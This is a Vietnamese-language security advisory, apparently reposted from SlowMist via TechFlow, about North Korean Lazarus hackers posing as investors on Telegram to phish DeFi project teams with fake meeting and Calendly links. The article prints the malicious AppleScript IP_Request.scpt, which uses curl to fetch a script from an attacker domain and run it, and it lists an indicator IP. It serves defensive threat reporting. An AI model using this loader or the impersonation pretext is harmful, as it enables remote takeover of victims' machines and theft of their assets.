
Mạng chậm: Phân tích cuộc tấn công lừa đảo có chủ đích của tin tặc Triều Tiên trên Telegram
Tuyển chọn TechFlowTuyển chọn TechFlow

Mạng chậm: Phân tích cuộc tấn công lừa đảo có chủ đích của tin tặc Triều Tiên trên Telegram
Các tin tặc Triều Tiên bắt đầu giả danh các tổ chức đầu tư nổi tiếng để lừa đảo đánh cắp thông tin từ các bên phát triển dự án, gây ảnh hưởng rộng rãi.
Tác giả: 23pds@Đội an toàn M慢雾
Bối cảnh
Ngay từ năm 2022, đội an toàn M慢雾 đã phát hiện qua mạng lưới tình báo BTI của M慢雾 rằng nhóm tin tặc Triều Tiên Lazarus đã bắt đầu chiến dịch lừa đảo钓鱼 trên Telegram quy mô lớn nhắm vào ngành tiền mã hóa. Gần đây, các tin tặc Triều Tiên còn mạo danh các tổ chức đầu tư nổi tiếng để thực hiện hành vi lừa đảo钓鱼 đối với các dự án. Do ảnh hưởng rộng rãi, M慢雾 tiến hành phân tích sự việc này.

Phương pháp kỹ thuật và chiến thuật
Một, chọn các tổ chức đầu tư nổi tiếng làm mục tiêu mạo danh, sau đó tạo tài khoản Telegram giả mạo:

Hai, tìm các dự án DeFi nổi bật làm mục tiêu, lấy lý do muốn đầu tư vào họ, dùng tài khoản giả để bắt đầu thực hiện lừa đảo:

Các tin tặc Triều Tiên sẽ chủ động nhắn tin với mục tiêu để thiết lập liên lạc. Nếu bên dự án nhìn thấy tin nhắn và thiếu ý thức an toàn, thì sẽ xảy ra tình huống như hình dưới đây:


Sau khi giành được niềm tin của đội dự án, tin tặc Triều Tiên sẽ hẹn họp, ở bước này có hai phương pháp tấn công:
1. Mời đội dự án tham gia cuộc họp tại các trang như ***.group-meeting.team, giả vờ hỏi đối phương có thời gian sắp xếp cuộc họp hay trao đổi chi tiết không, đồng thời chủ động cung cấp đường dẫn họp độc hại. Sau khi đội dự án nhấp vào liên kết, họ sẽ thấy thông báo giới hạn khu vực truy cập. Lúc này, tin tặc Triều Tiên sẽ tiếp tục dụ dỗ họ tải xuống và chạy tập lệnh độc hại "thay đổi vị trí". Một khi đội dự án làm theo, máy tính của họ sẽ bị tin tặc Triều Tiên kiểm soát, dẫn đến mất cắp tài sản. Dưới đây là nội dung tập lệnh độc hại IP_Request.scpt:
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k""& fix_url &""\""
run script sc
Giải thích mã:

2. Lợi dụng chức năng "thêm liên kết tùy chỉnh" trong hệ thống đặt lịch họp Calendly để chèn liên kết độc hại vào trang sự kiện, phát động tấn công钓鱼. Vì Calendly hòa hợp tốt với môi trường làm việc hàng ngày của hầu hết các đội dự án, nên những liên kết độc hại này khó gây nghi ngờ, khiến đội dự án dễ vô tình nhấp vào, tải xuống và thực thi mã độc. Khi đó, tin tặc Triều Tiên cũng có thể thu thập thông tin hoặc quyền truy cập hệ thống của đội dự án.

Đội an toàn M慢雾 cũng từng cảnh báo về phương pháp tấn công liên quan vào ngày 30 tháng 11 năm 2023:

IOC cơ bản:
IP: 104.168.137.21
Tên miền:

Mẫu tấn công độc hại:


Tổng kết
Do các hành vi lừa đảo dạng này vẫn đang tiếp diễn, người dùng Web3 được khuyến nghị nhất định phải xác minh tính xác thực của đối phương qua hai kênh trước khi thêm bạn bè, đồng thời bật xác thực hai yếu tố (2FA) cho Telegram, luôn chú ý đến an toàn giao dịch để tránh thiệt hại về tài sản.
Nếu vô tình thực thi phần mềm độc hại liên quan, hãy ngắt kết nối mạng, diệt virus ngay lập tức, chuyển tài sản liên quan, đồng thời thay đổi mật khẩu tài khoản liên quan (bao gồm cả những mật khẩu được trình duyệt ghi nhớ) trên máy tính bị ảnh hưởng.
Chào mừng tham gia cộng đồng chính thức TechFlow
Nhóm Telegram:https://t.me/TechFlowDaily
Tài khoản Twitter chính thức:https://x.com/TechFlowPost
Tài khoản Twitter tiếng Anh:https://x.com/BlockFlow_News














